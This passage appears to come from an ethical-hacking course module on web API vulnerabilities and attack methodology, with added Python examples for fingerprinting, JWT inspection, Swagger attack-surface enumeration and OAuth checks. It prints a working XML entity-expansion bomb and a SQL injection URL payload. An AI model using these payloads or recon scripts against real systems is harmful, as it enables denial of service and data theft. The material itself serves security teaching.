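def render_user_safe(user: UserRecord) -> str:
    """Hardened: project the record onto the response allowlist server-side."""
    return json.dumps({k: v for k, v in asdict(user).items() if k in CLIENT_VISIBLE},
                      sort_keys=True)


# Constructed request: a legitimate email change plus two keys the client
# must not be able to set.
PROFILE_UPDATE = json.dumps({"email": "alice@example.com", "role": "admin",
                             "credit_balance": 9999})


def _fresh_user() -> UserRecord:
    return UserRecord(7, "alice", "alice@old.example", password_hash="constructed-hash")


def demo() -> dict:
    """Apply the same request both ways and report what each path yields."""
    unsafe = update_profile_unsafe(_fresh_user(), PROFILE_UPDATE)
    safe, rejected = update_profile_safe(_fresh_user(), PROFILE_UPDATE)
    return {
        "unsafe_role": unsafe.role,
        "unsafe_balance": unsafe.credit_balance,
        "safe_role": safe.role,
        "safe_email": safe.email,
        "rejected_keys": rejected,
        "unsafe_response_leaks_hash": "password_hash" in json.loads(render_user_unsafe(unsafe)),
        "safe_response_leaks_hash": "password_hash" in json.loads(render_user_safe(safe)),
    }


if __name__ == "__main__":
    print(json.dumps(demo(), indent=2))
```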



API Vulnerabilities
Modern web applications and SaaS platforms use APIs due to their extensive features, and most
of the API security mainly focuses on technical aspects. Poor management of API permissions,
flaws in business logic, and exposure of application logic and sensitive data such as personally
identifiable information (PII) drastically increase the attack surface and pave the way for
attackers to target these vulnerabilities to perform many attacks such as DoS and code injection
attacks.
Some common API vulnerabilities are listed below:

1. Enumerated Resources
■ Design flaws can cause serious vulnerabilities, disclosing information through
unauthenticated public APIs
■ Allows attackers to guess user IDs easily, compromising the security of the user data
2. Sharing Resources via Unsigned URLs
■ The API returns URLs to hypermedia resources such as image, audio, or video files that are
vulnerable to hotlinking
■ This can cause several problems such as poor analytics and strains on resources, and can be
used by attackers for exploitation
■ Signed URLs can be used to implement policies such as rate limiting, auto expiration, and
scoped sharing
3. Vulnerabilities in Third-Party Libraries
■ Developers use third-party software libraries having open-source software licenses
■ Avoiding regular updates and relegating security fixes can result in many security flaws
4. Improper Use of CORS
■ Cross-origin resource sharing (CORS) is a mechanism that enables the web browser to
perform cross-domain requests; improper implementations of CORS can cause unintentional
flaws
■ Using the "Access-Control-Allow-Origin" header to allow all origins on private APIs can lead
to hotlinking
5. Code Injections
■ If the input is not sanitized, attackers may use code injection techniques such as SQLi and
XSS to add malicious SQL statements or code to the input fields on the API
■ Allows attackers to steal critical information such as session cookies and user credentials
6. RBAC Privilege Escalation
■ Privilege escalation is a common vulnerability present in APIs having role-based access
control (RBAC) where changes to endpoints are made without proper attention
■ Allows attackers to gain access to users' sensitive information
7. No ABAC Validation
■ No proper attribute-based access control (ABAC) validation allows attackers to gain
unauthorized access to API objects or perform actions such as viewing, updating, or deleting
8. Business Logic Flaws
■ Many APIs come with vulnerabilities in business logic
■ Allows attackers to exploit legitimate workflows for malicious purposes

Table 14.4: API vulnerabilities
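Vulnerability 2 above, sharing resources via unsigned URLs, beside the signed-URL scheme the table names as the remedy, as an added example (not code from the module): each issued link carries a scope and an expiry, both covered by a server-side signature, and the media service refuses links that fail any of the three checks. The host, paths, signing key, and timestamps are constructed.

```python
"""Added example: unsigned hypermedia links versus scoped, expiring signed links."""
import hashlib
import hmac
import time
from typing import Optional, Tuple
from urllib.parse import parse_qs, urlencode, urlsplit

SIGNING_KEY = b"constructed-signing-key"   # server-side secret, never sent to clients
BASE = "https://media.example"              # constructed media host


def unsigned_url(path: str) -> str:
    """The weak form from the table: a bare link anyone can reuse or hotlink."""
    return f"{BASE}/{path.lstrip('/')}"


def _mac(path: str, scope: str, expires: int, key: bytes) -> str:
    """Signature over everything the server will later rely on."""
    return hmac.new(key, f"{path}|{scope}|{expires}".encode(), hashlib.sha256).hexdigest()


def signed_url(path: str, scope: str, ttl: int, key: bytes = SIGNING_KEY,
               now: Optional[int] = None) -> str:
    """Issue a link bound to a scope (here, the requesting user) that expires after ttl seconds."""
    path = path.lstrip("/")
    now = int(time.time()) if now is None else now
    expires = now + ttl
    query = urlencode({"scope": scope, "expires": expires,
                       "sig": _mac(path, scope, expires, key)})
    return f"{BASE}/{path}?{query}"


def authorize(url: str, requester_scope: str, key: bytes = SIGNING_KEY,
              now: Optional[int] = None) -> Tuple[bool, str]:
    """Server-side check on an incoming request. Returns (allowed, reason)."""
    now = int(time.time()) if now is None else now
    parts = urlsplit(url)
    q = {k: v[0] for k, v in parse_qs(parts.query).items()}
    try:
        scope, expires, sig = q["scope"], int(q["expires"]), q["sig"]
    except (KeyError, ValueError):
        return False, "unsigned or malformed link"
    # Verify the signature first so nothing below acts on unauthenticated values.
    if not hmac.compare_digest(sig, _mac(parts.path.lstrip("/"), scope, expires, key)):
        return False, "bad signature"
    if now > expires:
        return False, "link expired"
    if scope != requester_scope:
        return False, "link is scoped to a different requester"
    return True, "ok"


if __name__ == "__main__":
    link = signed_url("images/42.jpg", scope="user:alice", ttl=600, now=1_700_000_000)
    print(link)
    print(authorize(link, "user:alice", now=1_700_000_100))
    print(authorize(link, "user:alice", now=1_700_000_700))
    print(authorize(link, "user:bob", now=1_700_000_100))
    print(authorize(unsigned_url("images/42.jpg"), "user:alice"))
```

Rate limiting, the third policy the table mentions, sits naturally on top of the scope: the server counts requests per scope rather than per anonymous link.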



Web API Hacking Methodology


Recent years have witnessed tremendous growth in the usage of web-based APIs for supporting
heterogeneous devices such as mobile devices and IoT devices. These devices frequently
communicate with backend web servers via APIs. To make these web-based APIs more user-
friendly, developers are taking shortcuts to security, making online web services vulnerable to
various attacks. Attackers use various techniques to identify and exploit vulnerabilities in these
APIs. To hack an API, attackers need to identify the API technologies, security standards, and
attack surface for exploitation.
Hacking a web API involves the following phases:
■ Identify the target
■ Detect security standards
■ Identify the attack surface
■ Launch attacks



Identify the Target


Before hacking an API, an attacker first needs to identify the target and its perimeter:

■ HTTP: APIs such as SOAP and REST mostly use the HTTP protocol for exchanging API
messages. HTTP is a text-based protocol in which the start line and headers are
transmitted in a readable format. For example, consider the following HTTP request
and response:

HTTP Request

    GET /doc/test.html HTTP/1.1                 <- Request line
    Host: www.certifiedhacker.com               \
    Accept: image/gif, image/jpeg, */*           |
    Accept-Language: en-us                       | Request message headers
    Accept-Encoding: gzip, deflate               |
    User-Agent: Firefox/68.4.1                   |
    Content-Length: 35                          /
                                                <- Blank line separating header and body
    bookId=78906&author=Rob+ert                 <- Request message body

Figure 14.90: Example of HTTP Request header


HTTP Response

    HTTP/1.1 200 OK                             <- Status line
    Date: Sun, 05 Jan xxxx 01:11:12 GMT         \
    Server: Apache/2.4 (Win32)                   |
    Last-Modified: Sat, 11 Jan xxxx              |
    ETag: "0-23-4024c3a5"                        | Response message headers
    Accept-Ranges: bytes                         |
    Content-Length: 35                           |
    Connection: close                            |
    Content-Type: text/html                     /
                                                <- Blank line separating header and body
    <h1> My Home page</h1>                      <- Response message body

Figure 14.91: Example of HTTP Response header

As shown in the figures, both the request and response headers are transmitted in
plaintext. Unless the API is served over TLS (HTTPS), an attacker on the path can read
and manipulate these headers to identify the target, for example from the Host,
Server, and Content-Type headers; even over TLS, the attacker can still inspect and
modify them with an intercepting proxy on a client they control.
■ Message Formats: API messages transmitted over the web use some format, such as
JSON for REST APIs and XML for SOAP APIs. Used incorrectly, these formats can pave
the way for vulnerabilities. Because the formats are easy to read, an attacker can
easily manipulate messages encoded in them to identify the target and its perimeter.
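The following Python script is an added example (it is not EC-Council code) of the target-identification step described above: it parses a captured request and response, classifies the body as JSON, form data, plain XML, or a SOAP envelope, and pulls the Host, Server, X-Powered-By, and SOAPAction headers and the API version from the path. The two sample exchanges, the www.certifiedhacker.com host, and the X-Powered-By header are constructed for the example.

```python
"""Fingerprint an API from a captured plaintext HTTP exchange.
Added example, not EC-Council code; the sample messages are constructed."""
import json
import re
import xml.etree.ElementTree as ET

# Constructed REST exchange, modeled on the request/response figures above.
REST_REQUEST = (
    "POST /api/v1/books HTTP/1.1\r\n"
    "Host: www.certifiedhacker.com\r\n"
    "Accept: application/json\r\n"
    "Content-Type: application/json\r\n"
    "Content-Length: 34\r\n"
    "\r\n"
    '{"bookId": 78906, "author": "Rob"}'
)
REST_RESPONSE = (
    "HTTP/1.1 201 Created\r\n"
    "Server: Apache/2.4 (Win32)\r\n"
    "X-Powered-By: PHP/7.4.3\r\n"  # constructed: a typical information-leaking header
    "Content-Type: application/json\r\n"
    "\r\n"
    '{"id": 78906, "author": "Rob"}'
)
# Constructed SOAP exchange against the same backend.
SOAP_REQUEST = (
    "POST /ws/BookService HTTP/1.1\r\n"
    "Host: www.certifiedhacker.com\r\n"
    "Content-Type: text/xml; charset=utf-8\r\n"
    'SOAPAction: "urn:GetBook"\r\n'
    "\r\n"
    '<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">'
    "<soap:Body><GetBook><bookId>78906</bookId></GetBook></soap:Body></soap:Envelope>"
)
SOAP_RESPONSE = (
    "HTTP/1.1 200 OK\r\n"
    "Server: Microsoft-IIS/10.0\r\n"
    "Content-Type: text/xml; charset=utf-8\r\n"
    "\r\n"
    '<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">'
    "<soap:Body><GetBookResponse><author>Rob</author></GetBookResponse>"
    "</soap:Body></soap:Envelope>"
)


def parse_http_message(raw):
    """Split a raw HTTP message into (start line, lower-cased header dict, body)."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return lines[0], headers, body


def classify_body(content_type, body):
    """Name the message format; SOAP is XML whose root element is an Envelope."""
    ct = content_type.lower()
    text = body.strip()
    if "json" in ct or text.startswith(("{", "[")):
        try:
            json.loads(text)
            return "json"
        except ValueError:
            return "unknown"
    if "xml" in ct or text.startswith("<"):
        try:
            root = ET.fromstring(text)
        except ET.ParseError:
            return "unknown"
        return "soap" if root.tag.lower().endswith("envelope") else "xml"
    if "x-www-form-urlencoded" in ct:
        return "form"
    return "unknown"


def fingerprint(raw_request, raw_response):
    """Summarize what an attacker learns about the target from one exchange."""
    req_line, req_headers, req_body = parse_http_message(raw_request)
    status_line, resp_headers, resp_body = parse_http_message(raw_response)
    method, path, _ = req_line.split(" ", 2)
    req_fmt = classify_body(req_headers.get("content-type", ""), req_body)
    resp_fmt = classify_body(resp_headers.get("content-type", ""), resp_body)
    if "soap" in (req_fmt, resp_fmt) or "soapaction" in req_headers:
        style = "soap"
    elif "json" in (req_fmt, resp_fmt) or path.startswith("/api"):
        style = "rest"
    else:
        style = "unknown"
    version = re.search(r"/(v\d+)(?:/|$)", path)
    return {
        "host": req_headers.get("host"),
        "method": method,
        "path": path,
        "api_version": version.group(1) if version else None,
        "style": style,
        "request_format": req_fmt,
        "response_format": resp_fmt,
        "status": status_line.split(" ", 2)[1],
        "server": resp_headers.get("server"),
        "powered_by": resp_headers.get("x-powered-by"),
        "soap_action": req_headers.get("soapaction"),
    }


if __name__ == "__main__":
    for req, resp in ((REST_REQUEST, REST_RESPONSE), (SOAP_REQUEST, SOAP_RESPONSE)):
        print(json.dumps(fingerprint(req, resp), indent=2))
```

Run against traffic recorded by an intercepting proxy, the same routine tells you in one pass whether you are facing a REST or SOAP service, which web server and runtime answer, and which version prefix to target; the message format decides which of the parser attacks later in this section apply.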



Detect Security Standards


Although APIs are often presented as secure because they incorporate standards such
as OAuth and SSL/TLS, they still contain many vulnerabilities that attackers can exploit.
■ APIs such as SOAP and REST implement different authentication/authorization
standards such as OpenID Connect, SAML, OAuth 1.X and 2.X, and WS-Security.
■ SSL/TLS provides transport-level security for API messages, ensuring confidentiality
through encryption and integrity through message authentication. TLS protects the
whole channel, but only where it is actually enforced: if some endpoints accept plain
HTTP, or if the API relies on message-level encryption of selected fields such as card
details instead of TLS, the remaining data travels in plaintext.
If these security standards are configured improperly, an attacker can identify
vulnerabilities in them for further exploitation. For example, an attacker can capture a
session token sent over an unencrypted connection and reuse it to retrieve a legitimate
user's account information.
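As an added example (not EC-Council code), the script below performs the detection step on one captured request: it records the transport scheme, recognizes HTTP Basic, bearer/JWT, and WS-Security authentication, decodes a JWT's header and claims without verifying the signature (an attacker cannot verify it either) to flag alg=none, HMAC algorithms, missing exp and aud claims, and notes tokens passed in the query string. The billpay.com URL, headers, and tokens are constructed; make_jwt only assembles a token-shaped string and signs nothing.

```python
"""Detect the authentication and transport standards a captured API request
relies on, and the weak configurations an attacker looks for first.
Added example, not EC-Council code; URL, headers and tokens are constructed,
and no signature is verified."""
import base64
import json
import time
from urllib.parse import parse_qs, urlsplit


def b64url_decode(segment):
    return base64.urlsafe_b64decode(segment + "=" * (-len(segment) % 4))


def b64url_encode(data):
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()


def make_jwt(header, claims, signature=""):
    """Assemble a JWT-shaped token for the samples; nothing is actually signed."""
    return ".".join([b64url_encode(json.dumps(header).encode()),
                     b64url_encode(json.dumps(claims).encode()), signature])


def inspect_jwt(token, now=None):
    """Decode header and claims without verification and list weaknesses."""
    parts = token.split(".")
    if len(parts) != 3:
        return None
    try:
        header = json.loads(b64url_decode(parts[0]))
        claims = json.loads(b64url_decode(parts[1]))
    except ValueError:  # not base64url / not JSON: an opaque token, not a JWT
        return None
    now = time.time() if now is None else now
    findings = []
    alg = str(header.get("alg", ""))
    if alg.lower() == "none" or parts[2] == "":
        findings.append("unsigned token (alg=none): claims can be forged")
    elif alg.upper().startswith("HS"):
        findings.append(f"{alg}: shared-secret HMAC, offline brute-force candidate")
    if "exp" not in claims:
        findings.append("no exp claim: a captured token is valid indefinitely")
    elif now > claims["exp"]:
        findings.append("token expired")
    if "aud" not in claims:
        findings.append("no aud claim: token may be replayed against another client")
    return {"alg": alg, "claims": claims, "findings": findings}


def detect_security_standards(url, headers, body="", now=None):
    """Classify transport and authentication for one captured request."""
    parts = urlsplit(url)
    hdrs = {k.lower(): v for k, v in headers.items()}
    result = {"transport": parts.scheme, "auth": "none", "findings": []}
    if parts.scheme != "https":
        result["findings"].append(
            "plaintext transport: headers, cookies and tokens readable on the wire")
    scheme, _, credential = hdrs.get("authorization", "").partition(" ")
    if scheme.lower() == "basic":
        result["auth"] = "basic"
        result["findings"].append("HTTP Basic: credentials are only base64-encoded")
    elif scheme.lower() == "bearer":
        result["auth"] = "bearer"
        jwt = inspect_jwt(credential, now)
        if jwt is not None:
            result["auth"] = "jwt"
            result["findings"].extend(jwt["findings"])
    elif "wsse:Security" in body:
        result["auth"] = "ws-security"
    for name in ("access_token", "token", "sessionid"):
        if name in parse_qs(parts.query):
            result["findings"].append(
                f"{name} sent in the URL: logged by proxies and servers, leaks via Referer")
    return result


if __name__ == "__main__":
    weak = make_jwt({"alg": "none", "typ": "JWT"}, {"sub": "459", "role": "user"})
    print(detect_security_standards("http://billpay.com/api/v1/cust/459?access_token=abc",
                                    {"Authorization": "Bearer " + weak}))
```

The findings list is the attacker's to-do list: an unsigned or HMAC-signed token invites forgery or offline cracking, a token with no expiry turns one captured request into permanent access, and a token in the URL ends up in every proxy and server log along the way.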


Identify the Attack Surface


After identifying the target API and its security implementations, an attacker needs to
identify the attack surface for launching the attack. Finding the attack surface of a
UI-based application is easy, as the input fields are visible on the web pages. Identifying
the attack surface of an API is different: there are no built-in UI fields, only an API
endpoint. To identify the attack surface of an API, attackers need to understand the
API's endpoints, messages, parameters, and behavior.


Use the following techniques to identify the attack surface of the target API:
■ API Metadata Vulnerabilities

API metadata reveals a large amount of technical information such as paths,
parameters, and message formats, which is useful for planning an attack. REST APIs
publish metadata in formats such as Swagger (OpenAPI), RAML, API Blueprint, and I/O
Docs, while SOAP APIs use WSDL/XML Schema. For example, consider the following
Swagger definition, annotated with the questions an attacker asks of each element.

Swagger Definition

    apis: [
      {
        path: "/cust/{custId}",
        operations: [
          {
            method: "DELETE",              <- HTTP method: are other methods handled correctly?
            summary: "Deletes a customer",
            notes: "",
            type: "void",
            nickname: "deleteCust",
            authorizations: {
              oauth2: [                    <- OAuth 2.0: are tokens enforced and validated correctly?
                {
                  scope: "write:custs",
                  description: "modify custs in your account"
                }
              ]
            },
            parameters: [
              {
                name: "custId",            <- Is access validated? Are IDs sequential? Injection point? What if we send ...
                description: "Cust id to delete",
                required: true,
                type: "string",
                paramType: "path",
                allowMultiple: false
              }
            ]
          }
        ]
      }
    ]

Figure 14.92: Example of Swagger definition

Attackers use the information in these definitions to locate weaknesses in the API and
perform various attacks on it.
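The following Python script is an added example (not EC-Council code) of turning the annotated questions on the Swagger definition into an attack-surface checklist: it walks every declared operation, records the OAuth scopes and parameters, and emits the tests an attacker would queue for each, plus the undeclared HTTP methods to probe on each path. The definition is rebuilt from Figure 14.92, with a second GET operation without any authorization added to the same path; the checklist wording is the example's own.

```python
"""Enumerate an API's attack surface from its Swagger metadata.
Added example, not EC-Council code; the definition below is constructed
from the figure, with an unauthenticated GET added for contrast."""
import json

SWAGGER = json.loads("""
{
  "apis": [
    {
      "path": "/cust/{custId}",
      "operations": [
        {
          "method": "DELETE", "nickname": "deleteCust", "type": "void",
          "authorizations": {"oauth2": [{"scope": "write:custs",
                                         "description": "modify custs in your account"}]},
          "parameters": [{"name": "custId", "description": "Cust id to delete",
                          "required": true, "type": "string", "paramType": "path"}]
        },
        {
          "method": "GET", "nickname": "getCust", "type": "Customer",
          "authorizations": {},
          "parameters": [{"name": "custId", "required": true, "type": "string", "paramType": "path"},
                         {"name": "fields", "required": false, "type": "string", "paramType": "query"}]
        }
      ]
    }
  ]
}
""")

ALL_METHODS = ("GET", "POST", "PUT", "PATCH", "DELETE", "OPTIONS", "HEAD")
STATE_CHANGING = {"POST", "PUT", "PATCH", "DELETE"}


def enumerate_attack_surface(spec):
    """Return one entry per declared operation plus one per path for undeclared methods."""
    surface = []
    for api in spec.get("apis", []):
        path = api["path"]
        declared = set()
        for op in api.get("operations", []):
            method = op["method"].upper()
            declared.add(method)
            scopes = [a["scope"] for a in op.get("authorizations", {}).get("oauth2", [])]
            params = op.get("parameters", [])
            checks = []
            if not scopes:
                checks.append("no authorization declared: call without a token")
            elif method in STATE_CHANGING:
                checks.append(f"scope enforcement: call {method} with a token lacking {scopes}")
            for p in params:
                if p.get("paramType") == "path" and p["name"].lower().endswith("id"):
                    checks.append(f"{p['name']}: ownership check (IDOR), sequential values")
                if p.get("type") == "string":
                    checks.append(f"{p['name']}: injection payloads, oversize/empty/null input")
                if not p.get("required", False):
                    checks.append(f"{p['name']}: behavior when omitted or sent twice")
            surface.append({"path": path, "method": method, "nickname": op.get("nickname"),
                            "scopes": scopes, "params": [p["name"] for p in params],
                            "checks": checks})
        undeclared = [m for m in ALL_METHODS if m not in declared]
        surface.append({"path": path, "method": "*", "nickname": None, "scopes": [],
                        "params": [],
                        "checks": [f"undeclared methods to probe: {', '.join(undeclared)}"]})
    return surface


def find(surface, path, method):
    """Look up one entry of the enumerated surface."""
    return next(e for e in surface if e["path"] == path and e["method"] == method)


if __name__ == "__main__":
    for entry in enumerate_attack_surface(SWAGGER):
        print(entry["method"], entry["path"], "->", "; ".join(entry["checks"]))
```

The same walk applies to an OpenAPI 3 document once the paths/methods/parameters/security keys are mapped; the point is that metadata written for client developers is, read from the other side, a complete list of where to send hostile input.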
• API Discovery

If an API does not publish metadata, attackers monitor and record the communication
between the API and an existing client to identify the initial attack surface. For example,
an attacker may install a mobile app that uses the target API, configure a local
intercepting proxy to record traffic, and configure the mobile device to route its traffic
through that proxy. The attacker then uses automated tools to generate metadata
(endpoints, methods, and parameters) from the recorded traffic.


■ Brute Force
If none of the above techniques works, attackers try to identify the API paths,
arguments, etc., through brute-forcing with wordlists. Common API paths used by
developers include /api, /api/v2, and /apis.json. Furthermore, hypermedia APIs return
links and parameters for related resources within each API response, which helps
attackers to discover further endpoints and expand the attack surface.
■ Analyze Web API Requests and Responses
Attackers can use tools such as Postman and ReqBin to intercept and analyze the
target web APIs, websites, and web services.
o Postman
Source: https://www.postman.com
Postman allows attackers to capture API traffic, including requests, responses, and
cookies, using its built-in proxy. The Postman Interceptor browser extension captures
requests and responses from the browser, while Postman's proxy runs inside the
Postman application and can be used with HTTP or HTTPS websites.

[Figure 14.93: Screenshot of Postman. The "Twitter API v2" collection is open on the "Tweet Lookup / Single Tweet" request (GET https://api.twitter.com/2/tweets/:id with Bearer token authorization); the documentation pane lists the expansions, tweet.fields, user.fields, media.fields, place.fields and poll.fields query parameters, and the response pane shows a 200 OK JSON body containing the requested tweet's "id" and "text".]


Launch Attacks

■ Fuzzing
■ Invalid Input Attacks
■ Malicious Input Attacks
■ Injection Attacks
■ Insecure SSL Configuration
■ Insecure Direct Object References (IDOR)
■ Insecure Session/Authentication Handling
■ Login/Credential Stuffing Attacks
■ API DDoS Attacks
■ Authorization Attacks on API
■ Reverse Engineering
■ User Spoofing
■ Man-in-the-Middle Attacks
■ Session Replay Attacks






API DDoS Attacks

■ A DDoS attack involves saturating an API with a huge volume of traffic from multiple infected computers (a botnet) to delay API services to legitimate users
■ Attackers often carry out these attacks using botnets that are built to discover the API's rate limit and stay within it, which increases the attack's chance of success

[Figure: botnet-based API DDoS. The attacker infects a machine (the bot), which looks for other vulnerable systems and infects them to create a botnet; the bots connect to the attacker's command-and-control (C&C) center; the attacker sets a bot C&C handler; the bots then attack the API, through the API gateway, on commands from the C&C.]

Authorization Attacks on API: OAuth Attacks

OAuth is an authorization protocol that allows a user to grant a third-party site limited access to their resources on another site without exposing their credentials to the third party.

OAuth Attacks

■ Attack on 'Connect' Request: Many sites let users link their accounts to other services such as LinkedIn, Instagram, and Twitter via OAuth. An attacker can tamper with the request that connects one site to another to gain unauthorized access to a victim's account.
■ Attack on 'redirect_uri': The redirect domain is usually registered by the client, and only 'redirect_uri' values on that domain are permitted. If an attacker can identify a vulnerability (such as an open redirect) in a web page on the client domain, they can exploit it to capture the authorization codes delivered to that page.
■ CSRF on Authorization Response: Attackers perform CSRF attacks to connect an attacker-controlled account on the provider with the victim's account on the client side. The attack exploits the third request of the flow, the one that delivers the authorization code to the client, when the client does not bind that code to the user's session with a 'state' parameter.
■ Access Token Reuse: OAuth requires that access tokens be issued to, and checked against, an individual client. If an access token issued to 'ClientA' is also accepted by 'ClientB', an attacker can obtain a token through ClientA and present it to ClientB as the victim. Attackers exploit this against clients that use the implicit grant and do not verify that the token was issued for them.


Authorization Attacks on API: OAuth Attacks (Cont'd)

■ SSRF Using Dynamic Client Registration Endpoint: Providers that support dynamic client registration expose a registration endpoint, commonly mapped to /register, that is often not advertised in public documentation. Attackers can perform an SSRF attack by supplying attacker-controlled URLs in the parameters of the registration POST request, which the server then fetches.
■ WebFinger User Enumeration: WebFinger is a standard protocol that returns information about a user in response to a GET request to "/.well-known/webfinger". Attackers query this endpoint with candidate usernames, for example "anonymous", and use the server's responses to determine which accounts exist on the OAuth server.
■ Exploiting Flawed Scope Validation: Attackers exploit flaws in an OAuth service provider's scope validation to achieve scope escalation, which results in the exfiltration of additional data of the resource owner. If the provider does not check that the scope in the token request matches what the user actually approved, an attacker who can modify the scope parameter obtains a token with additional scopes.

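The following Python script is an added example (not EC-Council code) of the authorization-server side of three of the OAuth attacks above: the 'redirect_uri' attack, the CSRF-on-authorization-response attack, and flawed scope validation. It puts a deliberately weak prefix-matching redirect_uri check beside the exact-match check, refuses authorization requests that carry no 'state', and makes the token endpoint take the granted scope from the stored authorization code rather than from the request. The client registration, the app.example.com callback, and the attacker's lookalike host are constructed for the example.

```python
"""Authorization-server checks for the OAuth attacks listed above:
redirect_uri matching, CSRF via a missing state parameter, and scope
escalation at the token endpoint. Added example, not EC-Council code;
the client registration and the weak checker are constructed."""
import secrets
from urllib.parse import parse_qs, urlsplit

REGISTERED_CLIENTS = {
    "clientA": {
        "redirect_uris": {"https://app.example.com/oauth/callback"},
        "scopes": {"read:custs"},
    },
}
ISSUED_CODES = {}  # authorization code -> what the user actually approved


def redirect_uri_allowed_weak(client_id, redirect_uri):
    """Flawed check: prefix match on the registered origin. Accepts
    https://app.example.com.attacker.net/... and any page on the real host."""
    for registered in REGISTERED_CLIENTS[client_id]["redirect_uris"]:
        parts = urlsplit(registered)
        if redirect_uri.startswith(f"{parts.scheme}://{parts.netloc}"):
            return True
    return False


def redirect_uri_allowed(client_id, redirect_uri):
    """Exact string match against the registered set, as RFC 6749 requires."""
    return redirect_uri in REGISTERED_CLIENTS[client_id]["redirect_uris"]


def authorize(client_id, redirect_uri, scope, state, consented_scopes):
    """Authorization endpoint. Returns ('redirect', url) or ('error', reason);
    a bad redirect_uri never results in a redirect anywhere."""
    client = REGISTERED_CLIENTS.get(client_id)
    if client is None:
        return "error", "unknown_client"
    if not redirect_uri_allowed(client_id, redirect_uri):
        return "error", "invalid_redirect_uri"
    if not state:  # no CSRF binding to the user's session: refuse
        return "error", "missing_state"
    requested = set(scope.split())
    if not requested <= client["scopes"]:
        return "error", "invalid_scope"
    if not requested <= set(consented_scopes):
        return "error", "consent_mismatch"
    code = secrets.token_urlsafe(24)
    ISSUED_CODES[code] = {"client_id": client_id, "scope": " ".join(sorted(requested))}
    return "redirect", f"{redirect_uri}?code={code}&state={state}"


def exchange_code(client_id, code, scope=None):
    """Token endpoint. The scope comes from the stored grant, never from the
    request, so a modified scope parameter cannot escalate privileges."""
    grant = ISSUED_CODES.get(code)
    if grant is None or grant["client_id"] != client_id:
        return "error", "invalid_grant"
    if scope is not None and not set(scope.split()) <= set(grant["scope"].split()):
        return "error", "invalid_scope"
    del ISSUED_CODES[code]  # single use
    return "token", {"access_token": secrets.token_urlsafe(32),
                     "token_type": "Bearer", "scope": grant["scope"]}


def code_from_redirect(url):
    """Pull the authorization code out of the redirect URL (the client's job)."""
    return parse_qs(urlsplit(url).query)["code"][0]


if __name__ == "__main__":
    print(redirect_uri_allowed_weak("clientA", "https://app.example.com.attacker.net/steal"))
    print(authorize("clientA", "https://app.example.com/oauth/callback",
                    "read:custs write:custs", "s1", ["read:custs"]))
```

The weak checker shows why substring and prefix matching of redirect_uri fails: the attacker registers a host whose name begins with the victim client's origin, or finds an open redirect on the real host, and the authorization code is delivered to them. The token endpoint ignoring the request's scope parameter is what closes the scope-escalation path.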

Launch Attacks
After identifying the target API, analyzing the message formats and security standards, and
identifying the attack surface, attackers perform various attacks on the target API to steal
sensitive information such as credit card details and credentials.
Various attacks performed on APIs are discussed below:
■ Fuzzing

Attackers use fuzzing to repeatedly send random or malformed input to the target
API in order to trigger error messages that reveal critical information, such as stack
traces, framework versions, or internal paths. To perform fuzzing, attackers use
automated scripts that send numerous requests with varying combinations of input
parameters. Attackers use tools such as Fuzzapi to fuzz the target API.
■ Invalid Input Attacks

In some scenarios, fuzzing is difficult to perform because of the structure of the
API's messages. In such cases, attackers give invalid input to the API, such as text in
place of numbers, numbers in place of text, more characters than expected, and null
characters, to extract sensitive information from unexpected system behavior and
error messages. At the same time, attackers also manipulate HTTP headers and their
values, targeting both the API logic and the HTTP protocol itself.
■ Malicious Input Attacks

In the attacks discussed above, attackers try to retrieve sensitive information from
unexpected system behavior or error messages. A more dangerous attack is one in
which the attackers inject malicious input directly to target both the API and its hosting
infrastructure. To perform this attack, attackers feed specially crafted documents to the
API's message parsers, for example XML documents that abuse entity expansion.
The following code snippet illustrates an XML bomb attack:

    <?xml version="1.0" encoding="utf-8"?>
    <!DOCTYPE lolz [
    <!ENTITY lol "lol">
    <!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
    <!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;">
    <!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
    <!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">
    <!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;">
    <!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;">
    <!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;">
    <!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;">
    <!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;">
    ]>
    <lolz>&lol9;</lolz>
When this document is processed by a vulnerable or misconfigured XML parser, the
parser tries to expand the lol9 entity, which resolves to ten copies of lol8, each of which
resolves to ten copies of lol7, and so on: a few hundred bytes of input expand to
roughly 3 GB of text, exhausting the server's memory. This either brings the target
server down completely or leaves it vulnerable to further attacks.
Another way in which attackers perform this attack is by uploading malicious script
files, e.g., uploading a shell script where the API expects a PDF document. This may
result in the malicious script being executed, bypassing the security mechanisms on
the server, or being propagated to other parties accessing the API. Using this technique,
attackers also try to extract information about the underlying filesystem.
■ Injection Attacks

Like traditional web applications, APIs are also vulnerable to various injection attacks.
For example, consider the following normal URL:
http://billpay.com/api/v1/cust/459

For this URL, the API retrieves the details of customer ID 459 from the database by
building the following SQL query from the path parameter:
"SELECT * FROM Customers where custID='" + custID + "'"


Here, custID is replaced with 459:

"SELECT * FROM Customers where custID='459'"

Now assume that an attacker injects the following malicious input into the URL:
http://billpay.com/api/v1/cust/'%20or%20'1'='1

After URL decoding, the path parameter becomes ' or '1'='1, and the resultant
malicious SQL query is

"SELECT * FROM Customers where custID='' or '1'='1'"

This query returns the details of all customers in the database. Using this
information, an attacker may further delete or modify the data in the database or use
the customers' information to perform other malicious activities on the database
server.
API injection attacks are performed not only with SQL but also with JSON, JavaScript,
